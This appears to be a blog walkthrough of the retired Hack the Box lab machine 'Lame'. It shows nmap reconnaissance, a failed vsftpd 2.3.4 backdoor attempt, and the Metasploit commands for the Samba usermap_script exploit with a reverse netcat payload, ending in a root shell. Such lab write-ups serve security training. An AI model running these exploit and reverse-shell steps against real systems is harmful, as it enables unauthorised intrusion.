As my last guide was unexpectedly popular (thanks mostly to a retweet by @hackthebox_eu, I figured I should get on and write another one; this time for Hack the Box retired machine, Lame.

Note: You can find my guide to Shocker here and my guide to Beep here.


So we begin, as always, with our initial nmap scan.

$ nmap -sC -sV -p- -oA nmap/initial

First look shows that there is an FTP service running which allows anonymous login, so lets take a peek and see what we can find.


Which unfortunately appears to be nothing :(

However, the nmap scan revealed the version of FTP software running is vsftpd 2.3.4. A quick searchsploit shows that this version of the software has a backdoor command execution vulnerability. Let's see if we can take advantage of this.


Looking at further information about this exploit shows it is a metasploit module, so lets fire up msfconsole and give it a whirl.


Lame indeed. It seems that while vsftpd 2.3.4 does have a backdoor command execution, this particular version must have been patched. So let's go back to our nmap scan and look for other attack vectors.

Our next likely candidate for attack presents itself, as the ports for Samba are open. These are always good to have a poke at given the history of security issues that have come up with Samba over the years.


Nmap has a number of scripts we can run to check for Samba vulnerabilities, so that's what we will try first.

$ nmap --script smb-vuln* --script-args=unsafe=1 -p 445

Unfortunately this also fails to find anything. However, taking the version number of Samba running from our initial nmap scan (3.0.20), we can run searchsploit which does present us with another likely candidate.


The second entry is a remote heap overflow so unlikely to help us here, but the first one looks more promising. It's another metasploit module, so let's fire up msfconsole again and give it a go.


We run the following:

> use exploit/multi/samba/usermap_script
> set rhost
> set payload cmd/unix/reverse_netcat
> set lhost
> exploit

And straight away we get a root shell, along with access to both flags :)